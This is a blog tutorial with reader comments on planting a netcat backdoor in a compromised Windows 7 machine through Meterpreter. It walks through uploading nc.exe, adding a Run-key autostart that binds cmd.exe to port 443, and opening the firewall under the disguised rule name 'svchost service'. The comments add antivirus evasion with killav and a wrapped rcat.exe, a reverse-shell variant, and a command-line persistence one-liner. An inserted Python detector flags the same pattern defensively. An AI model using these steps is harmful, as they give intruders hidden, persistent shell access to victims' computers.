10 Steps to Use NetCat as a Backdoor in Windows 7 System


Type : Tutorial

Level : Medium

OS Target : Windows 7 Ultimate

When an attacker successfully compromises a system they need to maintain their access. That is why attackers usually install a backdoor on the victim computer for future use, so they can easily reconnect to it, use its resources and collect data from it.

Are you sure netcat can be used as a backdoor? Yes, of course :-) In this tutorial I will write down the technique for setting up the famous listener application NetCat as a backdoor on a Windows system, once the attacker has compromised the victim computer and gained meterpreter access.

This tutorial is based on the access gained with the Java signed applet exploit in my previous tutorial.

Requirements :

1. NetCat
2. A Meterpreter session (you get one when the victim is successfully compromised with the selected payload)

10 Steps to Use NetCat as a Backdoor in Windows 7 System:

1. First you need to gain access to the victim computer and get a meterpreter session from the payload (I'm using the Java signed applet from my previous tutorial).


2. Next, upload your nc.exe to the victim computer with the following meterpreter command :

upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

This uploads nc.exe and places it in C:\windows\system32 on the victim computer.


If the upload fails (see the picture above), you need to escalate your privileges to the SYSTEM account (see the privilege escalation tutorial here).

3. When the upload succeeds it will look like this :


4. Next we configure the registry so that NetCat runs at Windows start-up and listens on port 443. We do this by editing the key "HKLM\software\microsoft\windows\currentversion\run". First enumerate the key :

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run


5. Then add NetCat to the start-up entries with this command :

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successful set nc.

6. Query the value to make sure our backdoor has really been added to the autorun list :

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc


7. Up to this step everything looks okay. Next we need to alter the system so that remote connections to our netcat backdoor are allowed through the firewall, using the netsh command to open port 443. Run the shell command from meterpreter to get a command prompt, then run :

netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443

8. Once the firewall rule has been added, check that the new rule really exists with this command :

netsh firewall show portopening


9. Everything has been set up so far; now run netcat on the attacker machine and try to connect to the victim computer :

nc -v victim_ip_address port


10. Test the backdoor by restarting the victim computer, using the reboot command from meterpreter or shutdown -r -t 00 from the Windows console, and then connect again with NetCat as in step 9.

meterpreter > reboot

or

C:\windows\system32>shutdown -r -t 00

If netcat shows a console, the NetCat backdoor has been injected into the victim computer successfully.

Countermeasures :

1. Even when the Windows firewall is enabled, make sure you also have another personal firewall installed that can detect inbound and outbound packets. Hope it's useful :-)
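As an added defensive check that is not part of the original tutorial: the Python script below parses constructed sample output of the two commands the steps above rely on (`reg query` on the Run key and `netsh advfirewall firewall show rule`), flags Run values that start a listener wired to a shell (the `-L ... -e cmd.exe` pattern from step 5) and pairs each one with the inbound allow rules that open its port (the rule from step 7). The sample output, value names and rule names are constructed here, not captured from a real host.

```python
import re
# Constructed samples, not captured from a real host: `reg query HKLM\...\Run` output and
# `netsh advfirewall firewall show rule name=all` output trimmed to the fields used below.
RUN_KEY_OUTPUT = r"""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
    SystemService    REG_SZ    C:\windows\system32\rcat.exe -Ldp 443 -e cmd.exe
"""
FIREWALL_OUTPUT = """Rule Name:                            svchost service
----------------------------------------------------------------------
Direction:                            In
LocalPort:                            443
Action:                               Allow
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Direction:                            Out
LocalPort:                            Any
Action:                               Allow
"""
SHELL_EXEC = re.compile(r"-[ec]\s+\S*(cmd|powershell)(\.exe)?\b", re.I)  # "-e cmd.exe"
LISTEN_FLAG = re.compile(r"(?<!\S)-\w*[lL]")                            # "-l" / "-Ldp"
LISTEN_PORT = re.compile(r"(?<!\S)-\w*p\w*\s+(\d{1,5})\b")              # "-p 443", "-Ldp 443"

def parse_run_values(text):
    """(name, type, data) for each value line of `reg query` output."""
    rows = [re.split(r"\s{2,}|\t", ln.strip(), maxsplit=2) for ln in text.splitlines()]
    return [tuple(r) for r in rows if len(r) == 3 and r[1].startswith("REG_")]

def suspicious_run_entries(values):
    """Flag Run values that bind a listener and hand the socket to a shell."""
    hits = []
    for name, _typ, data in values:
        if SHELL_EXEC.search(data) and LISTEN_FLAG.search(data):
            port = LISTEN_PORT.search(data)
            hits.append({"name": name, "cmd": data, "port": int(port.group(1)) if port else None})
    return hits

def parse_firewall_rules(text):
    """One dict per 'Rule Name:' block of `netsh ... show rule` output."""
    blocks = re.split(r"(?m)^(?=Rule Name:)", text)
    return [dict(re.findall(r"(?m)^([^:\n-]+?):\s*(.*)$", b)) for b in blocks if b.strip()]

def audit(run_text=RUN_KEY_OUTPUT, fw_text=FIREWALL_OUTPUT):
    """Pair each suspicious Run entry with the inbound Allow rules that open its port."""
    rules = parse_firewall_rules(fw_text)
    return [{**hit, "firewall_rules": [r["Rule Name"] for r in rules
             if r.get("Direction") == "In" and r.get("Action") == "Allow"
             and r.get("LocalPort") == str(hit["port"])]}
            for hit in suspicious_run_entries(parse_run_values(run_text))]
```

On a real host, pass `audit()` the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` and `netsh advfirewall firewall show rule name=all`; a flagged Run value with a matching inbound rule is exactly the combination steps 5 and 7 leave behind.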



Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • http://backtosecurity.com @Marts_McFly

    Nice tutorial.

    One thing is though that netcat gets detected by almost all AV vendors. So you will have to ‘killav’ in Meterpreter before uploading. But once the machine reboots nc.exe will get detected. One should use the new rcat.exe instead. It is wrapped to bypass AV http://packetstormsecurity.org/files/view/101512/rcat.zip

    One other thing is that the user will need port 443 opened and forwarding on their home modem/router/corporate firewall to the victim’s box. This probably won’t be the case for the majority of users. A better strategy would be to set netcat in a reverse tunnel and tunnel OUT on 443 to your own box, as opposed to trying to connect in. (This will bypass inbound ACLs at the gateway. Most home users will have UPnP enabled, and most companies would have outbound 443 open on their firewalls.)

    • http://www.vishnuvalentino.com v4L

      #Marts_McFly
      Nice one mate, you’re right :-P I wrote this tutorial late at night so I forgot that what I set up was on the victim computer..
      yep, you’re also right that setting up a reverse tunnel to our 443 would be better :-)
      and also for antivirus, nc.exe is detected by antivirus, but what I wanted to show here was the concept of planting a backdoor on the victim computer…
      but anyhow, thank you for your input & corrections :-)

  • Christian

    Can you get a meterpreter shell by connecting to netcat ?

    • http://www.vishnuvalentino.com v4L

      #Christian
      no we can’t get it…if you want to get your meterpreter you can view this tutorial

  • Martebs

    Hello vish, Nice tutorial with pic….. I really like it ^^
     
    thanks for that

    • http://www.vishnuvalentino.com v4L

      #Martebs
      you’re welcome man.. :-)

  • http://c0nnect3d.blogspot.com c0nnect3d

    Good Tutorial … But what about manually adding netcat to the Registry ?
     
    Regards
    c0nnect3d
    http://c0nnect3d.blogspot.com

    • http://www.vishnuvalentino.com v4L

      #connect3d
      to add manually, try to open your regedit and add new string value here HKLM\software\microsoft\windows\currentversion\run with this value data "C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"

  • http://c0nnect3d.blogspot.com c0nnect3d

    v4L,
    I know how to add it to the registry… But it would be better if you do this by command line. Actually when you pentest/hack a computer, generally you get a command shell (not GUI). Anyway, I will write a tutorial about this on my blog: c0nnect3d.blogpsot.com .
     
    Thanks for reply!!!
     
    Regards
    c0nnect3d
    www.c0nnect3d.blogspot.com

    • http://www.vishnuvalentino.com v4L

      #connect3d
      LoL…I thought you asked about manually adding it without using cmd…. :-P
      it’s nice if you already got it…here’s if you want to run it from cmd :
      reg add HKLM\software\microsoft\windows\currentversion\run /t REG_SZ -v SystemService -d "C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"
      sorry for that :-)

  • ZeroAsterix

    So, in conclusion the best technique is to have this string in your windows startup
    c:\windows\system32\rcat.exe -d 192.168.1.102 443 -e cmd.exe
    I applied the -d as a workaround to your quotes plus -h which didn’t work for me, I don’t know why but it just wouldn’t run in windows7, maybe you can explain why?
    here are some limitations I see with this setup that we might address:
    1) a computer must already be listening at the appropriate address (in this example 192.168.1.102) at the exact moment the compromised computer boots up, otherwise it will not send out the call again (until rebooted)
    2) once the connection is closed it will not be able to be re-opened until the compromised system reboots, and only then
    thoughts anyone?

    • http://www.vishnuvalentino.com v4L

      #ZeroAsterix
      btw you wrote this c:\windows\system32\rcat.exe -d 192.168.1.102 443 -e cmd.exe
      FYI : this -d switch isn’t an rcat switch, but the one for adding a registry value to windows…
      if you’re on meterpreter console, and already upload your rcat to victim machine you can follow the step no.5

      if you not use meterpreter and just got the victim console(but you already put your rcat on victim machine), then you can run this command to add new startup services…
      reg add HKLM\software\microsoft\windows\currentversion\run /t REG_SZ -v SystemService -d "C:\windows\system32\rcat.exe -Ldp 443 -e cmd.exe"
      where -v was the fake name(I use SystemService); and -d was the value and also location of your rcat


  • AJ

    when i try and upload to the victim it says unknown command upload…what is wrong?

    • http://www.vishnuvalentino.com v4L

      #AJ
      did you use upload command inside meterpreter?

  • http://123 1212

    Bro I am getting a problem in the 7th step when I write netsh advfirewall firewall add rule name=”svchost service” dir=in action=allow protocol=TCP localport=443

    it shows

    C:\WINDOWS\system32>netsh advfirewall firewall add rule name=”svchost service” dir=in action=allow protocol=TCP localport=443
    netsh advfirewall firewall add rule name=”svchost service” dir=in action=allow protocol=TCP localport=443
    The following command was not found: advfirewall firewall add rule “name=svchost service” dir=in action=allow protocol=TCP localport=443.

    plz help me bro

  • Thisara

    I can't add the firewall rule. Shell is not coming with Administrator privileges. How do i get the shell with administrator privileges. Please be kind enough to reply me asap.

    • isamael

      Yes, it’s true. This is because we attacked a windows xp or seven. On the other side, vista or 8, 100% functional.
      Try netsh firewall add allowedprogram C:\nc.exe nc ENABLE

  • php

    thanks for your great Tutorial…. a request
    is there any way to send a (malicious) file just by knowing the victim’s ip, no more?? not by sending a link or file and begging them to open it…you know it’s useful when the victim is just online and you can’t chat with the victim….

    • http://www.vishnuvalentino.com v4L

      #php

      if the system was vulnerable, yes you can, if no, you cannot

      • php

        i will be happy if u say how can i do it when the system is vulnerable…